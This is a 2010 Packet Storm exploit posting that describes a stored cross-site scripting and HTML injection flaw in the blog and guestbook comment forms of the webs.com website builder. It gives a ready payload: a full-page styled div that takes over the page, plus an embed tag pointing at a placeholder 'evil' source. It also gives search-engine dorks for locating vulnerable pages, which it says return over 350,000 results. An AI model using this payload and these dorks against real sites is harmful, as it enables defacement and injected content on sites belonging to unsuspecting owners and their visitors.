Free Website Creator Cross Site Scripting

2010-05-10T00:00:00
ID PACKETSTORM:89312
Type packetstorm
Reporter isoz
Modified 2010-05-10T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: webs.com Free Website Creator APPs XSS/HTML Injection  
# Date: 8/5/2010  
# Author: isoz - http://bioworm.org/forum  
# Software Link: http://webs.com  
# Version: Any  
# Tested on: Any OS  
# CVE : -  
# Code : [Example:]  
  
Description:  
Webs helps you make your own free website. Personal, group, and small  
business websites complete with photos, videos, and ecommerce.  
  
  
POC:  
Go to blogs or guestbook and execute the Example codes in the comments  
form.  
  
Example:  
<div style='top:0px;position:absolute;left:0px;width:  
900px;height:1800px;background-color:#000000;color:#FFFF00;text-align:  
center;'>  
  
<embed src="evil">  
  
  
  
Dorks:  
inurl:"webs.com/apps/blog"  
inurl:"webs.com/apps/guestbook"  
  
350,000+ results  
  
Greetz:  
JMADD ;)  
  
  
  
`